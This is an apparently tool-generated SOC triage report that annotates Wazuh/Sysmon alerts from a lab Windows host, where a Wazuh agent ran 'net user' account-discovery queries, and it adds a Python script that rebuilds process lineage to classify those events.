data.win.eventdata.processId:  9592
PID of the creating process; same PID as the previous alert.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Process that created the file.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_mqh0ir2i.w0v.ps1
Path of the created file. __PSScriptPolicyTest_<random>.ps1 in the user's Temp directory is written by powershell.exe itself at every start to test whether AppLocker/WDAC script enforcement is active; it is not an attacker-dropped payload, and it is a script, not an executable. Rule 92213 fired on the .ps1 extension under a Temp path, so this alert adds no evidence beyond "PowerShell started" and should not stand as a separate High on its own. Expect one of these from every PowerShell launch on this host.

data.win.eventdata.creationUtcTime:  2025-04-24 22:35:52.870
File creation timestamp as reported by the filesystem; equal to utcTime for a freshly created file, as here. A value earlier than utcTime means an existing file was overwritten rather than newly created.

data.win.eventdata.user:  Attacker\\Attcker1
Account that created the file; the same user as the PowerShell process.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

A net.exe account discovery command was initiated

🧠 What happened? A net.exe account discovery command was initiated

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:36:55.851+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:55.851+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  A net.exe account discovery command was initiated
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92039
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534215.1002249
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that emitted the event. Microsoft-Windows-Sysmon means the eventID below uses Sysmon's numbering, not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
Fixed GUID of the Sysmon provider; identical on every host, so it is a safe filter key.

data.win.system.eventID:  1
Event ID in the provider's own numbering. For Sysmon, 1 = Process Create (this event); the 4624/4688 numbers belong to the Security channel only.

data.win.system.version:  5
Schema version of the event template. Field layout can change between versions, so check this first when a parser breaks after a Sysmon upgrade.

data.win.system.level:  4
Numeric event level; 4 = Informational. Sysmon writes everything at this level, so it carries no severity signal.

data.win.system.task:  1
Task category of the event. Sysmon sets it equal to the event ID, so it adds nothing here.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:53.9716064Z
UTC time the event was written to the event log. Compare with data.win.eventdata.utcTime (when Sysmon observed the event) and the Wazuh timestamp (when the manager received it).

data.win.system.eventRecordID:  282297
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the Sysmon service that wrote the event, not of the process the event describes (that one is data.win.eventdata.processId).

data.win.system.threadID:  4740
Thread of the Sysmon service that wrote the event; same caveat as processID.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the agent read this from. Sysmon events live in their own Operational channel, not in Security.

data.win.system.computer:  Attacker
Hostname recorded inside the event; should match agent.name.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:35:53.953 ProcessGuid: {94294ddc-bcc9-680a-b80a-000000000e00} ProcessId: 11604 Image: C:\Windows\SysWOW64\net.exe FileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net.exe CommandLine: net user guest CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} ParentProcessId: 3244 ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe" ParentUser: NT AUTHORITY\SYSTEM"
Full Sysmon event text as rendered by the provider. Every data.win.eventdata.* field below is parsed out of it, so fall back to this when a parsed field looks truncated or mis-decoded.

data.win.eventdata.utcTime:  2025-04-24 22:35:53.953
UTC time at which Sysmon recorded the process start, about 62 seconds before the Wazuh timestamp. It is three seconds after the PowerShell cradle above, but in a different logon session (SYSTEM) and a different process lineage, so proximity in time alone does not link the two.

data.win.eventdata.processGuid:  {94294ddc-bcc9-680a-b80a-000000000e00}
Sysmon's unique process identifier. Unlike the PID it is never reused, so pivot on it (and on parentProcessGuid) to rebuild the process tree. The net1.exe alert that follows names this GUID as its parent.

data.win.eventdata.processId:  11604
Windows PID. PIDs are recycled after exit, so use it only together with processGuid or utcTime.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net.exe
Full path of the executable. This is the 32-bit copy under SysWOW64: WOW64 file-system redirection picks it whenever the parent is a 32-bit process, which fits an agent installed under Program Files (x86).

data.win.eventdata.fileVersion:  10.0.26100.1882 (WinBuild.160101.0800)
Version string from the PE version resource. Attacker-built binaries can claim anything here, so it is a hint, not proof of origin.

data.win.eventdata.description:  Net Command
Description string from the PE version resource; forgeable, same caveat as fileVersion.

data.win.eventdata.product:  Microsoft® Windows® Operating System
Product string from the PE version resource; forgeable.

data.win.eventdata.company:  Microsoft Corporation
Company string from the PE version resource; forgeable. A Microsoft value on a binary outside a Windows directory is a red flag, not reassurance.

data.win.eventdata.originalFileName:  net.exe
File name compiled into the PE version resource. It matches the basename of image, so the binary was not renamed on disk.

data.win.eventdata.commandLine:  net user guest
Exact command line: a query of the local Guest account's status. On its own this is low-signal discovery (T1087); what decides its severity is the parent.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
Working directory, inherited from the parent. The Wazuh agent's own install directory points at the agent as the originator.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
Account the process runs as; the local SYSTEM account here, as a service-launched process would be.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
Sysmon's identifier for the logon session; constant for everything started in that session.

data.win.eventdata.logonId:  0x3e7
Windows logon session ID. 0x3e7 (999) is always the local SYSTEM session, consistent with the user field.

data.win.eventdata.terminalSessionId:  0
Windows session number. 0 is the services session: this was started by a service, not from a logged-on desktop.

data.win.eventdata.integrityLevel:  System
Integrity level of the process token. System is the highest available.

data.win.eventdata.hashes:  SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
Hash of the image file using the algorithms configured in Sysmon (only SHA256 here). Compare with a known-good net.exe from the same Windows build before trusting the version metadata.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea88-67fe-4900-000000000e00}
Sysmon GUID of the parent. Its timestamp component (67fe) is well before this event's (680a), i.e. a long-running process, which fits a service rather than an attacker's shell.

data.win.eventdata.parentProcessId:  3244
PID of the parent; recycled after exit, so prefer the GUID.

data.win.eventdata.parentImage:  C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe
Executable that spawned net.exe: the Wazuh agent itself, running as SYSTEM from its install directory. This is the pattern the agent's own Security Configuration Assessment (SCA) checks produce when they query local accounts, which is why rule 92039 is only level 3. Confirm by checking the SCA policy enabled on agent 001 and the check's schedule; if no policy runs net user, treat the agent process as possibly hijacked and escalate.

data.win.eventdata.parentCommandLine:  \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\"
Command line of the parent: the bare service executable with no arguments, as a service start looks.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
Account the parent runs as; the agent service runs as SYSTEM, so no privilege change at this hop.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions
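The decisive check for this alert is lineage, shown here as an added example (the code is ours, not SOCscribe's or Wazuh's): rebuild the process chain from ProcessGuid/ParentProcessGuid using the Process Create records in this report and label each net.exe/net1.exe event by what sits above it. A chain that tops out at wazuh-agent.exe, as this one does, is what the agent's own SCA checks look like; confirm against the SCA policy active on agent 001 before closing. EVENTS is projected from the fields in this report; the verdict labels and function names are this example's own.

```python
"""Rebuild Sysmon process lineage via ProcessGuid/ParentProcessGuid and label
net.exe account-discovery events by their origin.

Added example for this report, not SOCscribe or Wazuh code. EVENTS is built from
the Process Create fields shown in this report; parents that appear only in a
child's Parent* fields (the agent, the first PowerShell) have no record of
their own, and the lineage walk reports that rather than guessing.
"""
from typing import Dict, List, Optional

# Projection of the Sysmon event 1 records in this report (GUIDs, PIDs, images, users as logged).
EVENTS: List[dict] = [
    {"guid": "{94294ddc-bcc6-680a-b30a-000000000e00}", "pid": 9592,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "user": r"Attacker\Attcker1",
     "parent_guid": "{94294ddc-bcc2-680a-ae0a-000000000e00}", "parent_pid": 1148,
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_user": r"Attacker\Attcker1"},
    {"guid": "{94294ddc-bcc7-680a-b50a-000000000e00}", "pid": 10700,
     "image": r"C:\Windows\SysWOW64\net1.exe", "user": r"NT AUTHORITY\SYSTEM",
     "parent_guid": "{94294ddc-bcc5-680a-b10a-000000000e00}", "parent_pid": 12028,
     "parent_image": r"C:\Windows\SysWOW64\net.exe", "parent_user": r"NT AUTHORITY\SYSTEM"},
    {"guid": "{94294ddc-bcc9-680a-b80a-000000000e00}", "pid": 11604,
     "image": r"C:\Windows\SysWOW64\net.exe", "user": r"NT AUTHORITY\SYSTEM",
     "parent_guid": "{94294ddc-ea88-67fe-4900-000000000e00}", "parent_pid": 3244,
     "parent_image": r"C:\Program Files (x86)\ossec-agent\wazuh-agent.exe",
     "parent_user": r"NT AUTHORITY\SYSTEM"},
    {"guid": "{94294ddc-bcca-680a-ba0a-000000000e00}", "pid": 4036,
     "image": r"C:\Windows\SysWOW64\net1.exe", "user": r"NT AUTHORITY\SYSTEM",
     "parent_guid": "{94294ddc-bcc9-680a-b80a-000000000e00}", "parent_pid": 11604,
     "parent_image": r"C:\Windows\SysWOW64\net.exe", "parent_user": r"NT AUTHORITY\SYSTEM"},
]

AGENT_IMAGE_SUFFIX = r"\ossec-agent\wazuh-agent.exe"


def index_by_guid(events: List[dict]) -> Dict[str, dict]:
    return {e["guid"]: e for e in events}


def lineage(index: Dict[str, dict], guid: str) -> List[dict]:
    """Walk child -> parent. A final hop with 'observed': False means that parent
    is known only from its child's Parent* fields; pull its own Sysmon event
    before calling the chain complete."""
    chain: List[dict] = []
    seen = set()
    ev: Optional[dict] = index.get(guid)
    while ev is not None and ev["guid"] not in seen:
        seen.add(ev["guid"])
        chain.append({"guid": ev["guid"], "image": ev["image"],
                      "user": ev["user"], "observed": True})
        parent = index.get(ev["parent_guid"])
        if parent is None:
            chain.append({"guid": ev["parent_guid"], "image": ev["parent_image"],
                          "user": ev["parent_user"], "observed": False})
        ev = parent
    return chain


def classify_net_discovery(index: Dict[str, dict], guid: str) -> str:
    """Label a net.exe / net1.exe account-discovery event by what is above it."""
    chain = lineage(index, guid)
    images = [hop["image"].lower() for hop in chain]
    if not images or not images[0].endswith(("\\net.exe", "\\net1.exe")):
        return "not-net"
    if any(img.endswith(AGENT_IMAGE_SUFFIX.lower()) for img in images):
        # Shape of the Wazuh agent running its own configuration checks;
        # verify against the SCA policy enabled on this agent before closing.
        return "agent-originated"
    if any("powershell" in img or img.endswith("\\cmd.exe") for img in images[1:]):
        return "shell-spawned"
    if not chain[-1]["observed"]:
        return "unattributed"   # chain ends at a parent we have no event for
    return "other"


def triage(events: List[dict]) -> Dict[str, str]:
    idx = index_by_guid(events)
    return {e["guid"]: classify_net_discovery(idx, e["guid"]) for e in events}


if __name__ == "__main__":
    idx = index_by_guid(EVENTS)
    for guid, verdict in triage(EVENTS).items():
        tree = " <- ".join(h["image"].rsplit("\\", 1)[-1] for h in lineage(idx, guid))
        print(f"{guid}  {verdict:<17} {tree}")
```

For the net user administrator event (PID 10700) the chain stops at a net.exe whose own Process Create record is not in this report, so the verdict is "unattributed" rather than "agent-originated": fetch that record before assuming the two account queries share an origin.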

A net.exe account discovery command was initiated

🧠 What happened? A net.exe account discovery command was initiated

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:36:55.880+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:55.880+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  A net.exe account discovery command was initiated
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92039
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534215.1007500
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that emitted the event. Microsoft-Windows-Sysmon means the eventID below uses Sysmon's numbering, not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
Fixed GUID of the Sysmon provider; identical on every host, so it is a safe filter key.

data.win.system.eventID:  1
Event ID in the provider's own numbering. For Sysmon, 1 = Process Create (this event); the 4624/4688 numbers belong to the Security channel only.

data.win.system.version:  5
Schema version of the event template. Field layout can change between versions, so check this first when a parser breaks after a Sysmon upgrade.

data.win.system.level:  4
Numeric event level; 4 = Informational. Sysmon writes everything at this level, so it carries no severity signal.

data.win.system.task:  1
Task category of the event. Sysmon sets it equal to the event ID, so it adds nothing here.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:54.1048194Z
UTC time the event was written to the event log. Compare with data.win.eventdata.utcTime (when Sysmon observed the event) and the Wazuh timestamp (when the manager received it).

data.win.system.eventRecordID:  282300
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the Sysmon service that wrote the event, not of the process the event describes (that one is data.win.eventdata.processId).

data.win.system.threadID:  4740
Thread of the Sysmon service that wrote the event; same caveat as processID.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the agent read this from. Sysmon events live in their own Operational channel, not in Security.

data.win.system.computer:  Attacker
Hostname recorded inside the event; should match agent.name.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:35:54.098 ProcessGuid: {94294ddc-bcca-680a-ba0a-000000000e00} ProcessId: 4036 Image: C:\Windows\SysWOW64\net1.exe FileVersion: 10.0.26100.1 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net1.exe CommandLine: C:\WINDOWS\system32\net1 user guest CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 ParentProcessGuid: {94294ddc-bcc9-680a-b80a-000000000e00} ParentProcessId: 11604 ParentImage: C:\Windows\SysWOW64\net.exe ParentCommandLine: net user guest ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:54.098
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcca-680a-ba0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  4036
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  C:\\WINDOWS\\system32\\net1 user guest
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcc9-680a-b80a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  11604
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  net user guest
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

A net.exe account discovery command was initiated

🧠 What happened? A net.exe account discovery command was initiated

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:36:55.946+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:55.946+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  A net.exe account discovery command was initiated
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92039
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534215.1012577
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:54.2509434Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282303
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:35:54.246 ProcessGuid: {94294ddc-bcca-680a-bb0a-000000000e00} ProcessId: 4340 Image: C:\Windows\SysWOW64\net.exe FileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net.exe CommandLine: net user administrator CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} ParentProcessId: 3244 ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:54.246
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcca-680a-bb0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  4340
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1882 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  net user administrator
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea88-67fe-4900-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3244
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

A net.exe account discovery command was initiated

🧠 What happened? A net.exe account discovery command was initiated

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:36:56.016+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:56.016+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  A net.exe account discovery command was initiated
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92039
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
